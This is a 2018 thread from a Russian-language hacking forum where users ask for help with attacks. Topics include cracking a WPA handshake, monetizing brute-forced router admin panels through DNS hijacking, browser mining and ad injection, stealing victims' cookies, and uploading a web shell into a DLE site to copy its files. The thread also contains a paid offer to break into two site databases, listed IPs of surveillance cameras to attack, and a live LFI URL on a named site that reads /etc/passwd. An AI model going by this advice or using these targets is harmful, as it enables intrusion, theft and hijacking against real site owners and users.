Возможно здесь ребята используют намного более сложные программы для подбора пароля .
А мои сильно устарели .
Или в чём может быть причина ?
Как Вы считаете ?
Turanchocks_
07.01.2018, 13:58
↑ (https://antichat.live/posts/4170267/)
Или в чём может быть причина ?
Причина в win.Надо чтобы было nix
Aleksandr081
07.01.2018, 16:52
↑ (https://antichat.live/posts/4170269/)
Причина в win.Надо чтобы было nix
Всё оказалось сложнее , чем Вы предполагали , я выполнил Ваш совет , и проверил через BT5 . результат тот же : не найден , хотя пароль в словаре ! Смотрите вот скриншот из BT5 : http://i.piccy.info/i9/2bfe98549821c02108ecfd12d7fd7706/1515328858/107830/1210805/Screenshot.jpg
Так что похоже здесь на форуме используют намного более сложные программы !
Могу предоставить хендшейк и текстовый файл , если не верите моей проблеме . Возможно причина в хендшейке , и старые программы не помогают , я это глубоко не изучал , и поэтому не знаю .
juicybrute
22.01.2018, 01:30
Привет, помогите советом, есть целая куча сбрученных админок роутеров, но не могу придумать, что с ними сделать можно. Из мыслей которые приходили в голову подмена dns и встраивание майнера (но не могу найти детальной инфы на эту тему), подмена рекламы на страницах посещаемых юзером (но тут тоже дальше идеи не ушло). В общем багаж знаний скудноватый, не хватает его.
mazaxaka
24.01.2018, 14:59
↑ (https://antichat.live/posts/4175831/)
Привет, помогите советом, есть целая куча сбрученных админок роутеров, но не могу придумать, что с ними сделать можно. Из мыслей которые приходили в голову подмена dns и встраивание майнера (но не могу найти детальной инфы на эту тему), подмена рекламы на страницах посещаемых юзером (но тут тоже дальше идеи не ушло). В общем багаж знаний скудноватый, не хватает его.
майнер на роутере возможен только с перепрошивкой, и то не везде
juicybrute
25.01.2018, 16:18
↑ (https://antichat.live/posts/4176811/)
майнер на роутере возможен только с перепрошивкой, и то не везде
Спасибо, уже нашел решение интересное. оба с подменой dns, одно майнинг в браузере который не отрубается даже при закрытии вкладки, второе собственно подсовывание/подмена рекламы. Вопрос того насколько это вообще имеет в смысл в плане доходности. Проверю в ближ время...
Нужно взломать две бд на сайтах типо fake-scam и почистить пару тем. За каждый сайт платим 300 у.е. Ищем постоянных партнеров. Писать в телеграмм Unclesom
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?
BabaDook
06.03.2018, 21:54
↑ (https://antichat.live/posts/4190679/)
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?
Браузером
erwerr2321
06.03.2018, 23:03
↑ (https://antichat.live/posts/4190679/)
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?
curl' ом, burp' ом тоже можно попытаться...
erwerr2321
06.03.2018, 23:04
↑ (https://antichat.live/posts/4190689/)
Браузером
Да.
↑ (https://antichat.live/posts/4190679/)
Скажите пожалуйста,чем можно проверить веб-приложение на уязвимость?
curl' ом, burp' ом тоже можно попытаться...
чтобы получить доступ к файлам куки жертвы,каким способом это можно сделать,нужна ли для этого программа?
BabaDook
08.03.2018, 00:57
↑ (https://antichat.live/posts/4191002/)
чтобы получить доступ к файлам куки жертвы,каким способом это можно сделать,нужна ли для этого программа?
Вариантом миллиард и больше. Задавайте точные вопросы, описывайте что есть, что хотите, как вы видите данную ситуацию.
Есть уязвимости на системы видео наблюдения?
http://185.54.238.144/
http://185.54.238.156/
http://185.54.238.157/
http://185.54.238.190/
karkajoi
24.04.2018, 16:45
↑ (https://antichat.live/posts/4204132/)
Есть уязвимости на системы видео наблюдения?
http://185.54.238.144/
http://185.54.238.156/
http://185.54.238.157/
http://185.54.238.190/
https://www.exploit-db.com
http://0day.today/
http://google.com/
Вперед
BabaDook
24.04.2018, 21:05
↑ (https://antichat.live/posts/4204132/)
Есть уязвимости на системы видео наблюдения?
http://185.54.238.144/
http://185.54.238.156/
http://185.54.238.157/
http://185.54.238.190/
↑ (https://antichat.live/posts/4204547/)
https://www.exploit-db.com
http://0day.today/
http://google.com/
Вперед
Это лучше
http://routerpwn.com/
Тот_самый_Щуп
07.05.2018, 03:07
Буду признателен, если поделитесь годными словарями для перебора директорий\файлов и так далее на сайте, под Dirbuster и аналогичный софт, стандартные словари слишком убогие.
BabaDook
07.05.2018, 13:21
↑ (https://antichat.live/posts/4207788/)
Буду признателен, если поделитесь годными словарями для перебора директорий\файлов и так далее на сайте, под Dirbuster и аналогичный софт, стандартные словари слишком убогие.
Фаз лист бума
Тот_самый_Щуп
08.05.2018, 01:35
↑ (https://antichat.live/posts/4207865/)
Фаз лист бума
Благодарю. Это считается самая топовая? Если может быть есть аналогичные, буду особенно признателен.
BabaDook
08.05.2018, 01:56
↑ (https://antichat.live/posts/4208015/)
Благодарю. Это считается самая топовая? Если может быть есть аналогичные, буду особенно признателен.
Я ее использую. Ещё биг словарь из дирба. Еще всякие админ листы,олд файлы. От бума типа универсальный
Можно ли при наличии доступа к БД залить шелл в DLE?
↑ (https://antichat.live/posts/4209303/)
Можно ли при наличии доступа к БД залить шелл в DLE?
dumpfile (https://mariadb.com/kb/en/library/select-into-dumpfile/)
Спасибо, а вообще как проще все файлы сайта слить, этим способом или еще есть пути?Ведь, как я понимаю, если у меня есть БД, то есть и доступ в админку. Какой самый простой и быстрый путь?
BabaDook
14.05.2018, 01:29
↑ (https://antichat.live/posts/4209311/)
Спасибо, а вообще как проще все файлы сайта слить, этим способом или еще есть пути?Ведь, как я понимаю, если у меня есть БД, то есть и доступ в админку. Какой самый простой и быстрый путь?
Этим-это каким? Вам не совсем верно подсказали. Вы можите залить иди слить файлы при высоких правах. То есть наличие доступа к БД вам ничего не гарантирует, даже при высоких правах. Но,какой вопрос такой и ответ.
↑ (https://antichat.live/posts/4209466/)
Этим-это каким? Вам не совсем верно подсказали. Вы можите залить иди слить файлы при высоких правах. То есть наличие доступа к БД вам ничего не гарантирует, даже при высоких правах. Но,какой вопрос такой и ответ.
А какой вопрос? Давайте по-другому спрошу. У меня есть доступ к БД, я бы хотел слить весь сайт. Из админки сайта этого сделать не получвается (DLE хорош), поэтому думаю в сторону шелла, но могу ошибаться, поэтому спрашиваю есть ли пути и какой проще?
BabaDook
14.05.2018, 20:11
↑ (https://antichat.live/posts/4209485/)
А какой вопрос? Давайте по-другому спрошу. У меня есть доступ к БД, я бы хотел слить весь сайт. Из админки сайта этого сделать не получвается (DLE хорош), поэтому думаю в сторону шелла, но могу ошибаться, поэтому спрашиваю есть ли пути и какой проще?
Вот, теперь слить- я так понял хотите файлы. Тут вам естественно проще через админку залить шелл, и уже потом сливать файлы.
Имеется XSS на сайте, alert работает, абсолютно все скрипты срабатываются, фильтра нет, но document.cookie отдает пустое значение. Готов заплатить деньги за консультацию.
Тот_самый_Щуп
18.05.2018, 17:27
↑ (https://antichat.live/posts/4210433/)
Имеется XSS на сайте, alert работает, абсолютно все скрипты срабатываются, фильтра нет, но document.cookie отдает пустое значение. Готов заплатить деньги за консультацию.
Так на сайте вы XSS нашли, или на левом поддомене всё же?
CyberTro1n
18.05.2018, 19:02
↑ (https://antichat.live/posts/4208018/)
Я ее использую. Ещё биг словарь из дирба. Еще всякие админ листы,олд файлы. От бума типа универсальный
Не юзал. Старый парс?
mindsmith
10.06.2018, 00:08
Есть паблик LFI, читает passwd, php.ini, group.Не конвертится традиционными методами (врапперы забанены или не отвечают, логи не отвечают, /proc/self/fd и environ не отвечают).
Смущает ответ сервера при разных запросах: на /var/log/apache2/access.log пустой ответ, при вызове любого wrapper-а нет ответа вовсе.Почему нет ответа и что я упускаю?
Пример: 123sardaigne.fr/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=/etc/passwd
BabaDook
10.06.2018, 00:14
↑ (https://antichat.live/posts/4216790/)
Есть паблик LFI, читает passwd, php.ini, group.Не конвертится традиционными методами (врапперы забанены или не отвечают, логи не отвечают, /proc/self/fd и environ не отвечают).
Смущает ответ сервера при разных запросах: на /var/log/apache2/access.log пустой ответ, при вызове любого wrapper-а нет ответа вовсе.Почему нет ответа и что я упускаю?
Пример: 123sardaigne.fr/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=/etc/passwd
Как вы при LFI можете читать есть врапперы забанены или не отвечают.
на /var/log/apache2/access.log пустой ответ может быть такое что нету доступа к файлу.
при вызове любого wrapper-а нет ответа вовсе - может быть ошибка скрипта, а может что-то ещё.
что я упускаю? тут очень сложно сказать.
mindsmith
10.06.2018, 00:27
Читать через include же.Это функция, не враппер.
На ошибку скрипта не похоже, таких на паблике слишком много набирается, на разных дырках.
Перефразирую: В какую сторону в таком случае посоветуете копать и какие блокировки на серваке могут вызвать такие симптомы?
BabaDook
10.06.2018, 00:43
↑ (https://antichat.live/posts/4216793/)
Читать через include же.Это функция, не враппер.
На ошибку скрипта не похоже, таких на паблике слишком много набирается, на разных дырках.
Перефразирую: В какую сторону в таком случае посоветуете копать и какие блокировки на серваке могут вызвать такие симптомы?
поглядите в сторону временных файлов, или файлов сессии. Или ищите где можно загрузить файл.
Pirnazar
26.06.2018, 15:04
Помогите найти exploit для Apache 2.2.16 (Debian)
↑ (https://antichat.live/posts/4221247/)
Помогите найти exploit для Apache 2.2.16 (Debian)
здесь поищи: https://0day.today
Pirnazar
26.06.2018, 15:23
Там нету
AdWordsSeller
28.06.2018, 00:31
Все привет. Ищу людей, которые работали или работаю с рекламой в Baidu. Нужна помощь в настройке рекламы.
foozzione
05.07.2018, 20:23
phpmyadmin 4.8.0.1, на странице авторизации токен выглядит так - https://i.imgur.com/J9vms8e.png
в чем может быть проблема?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot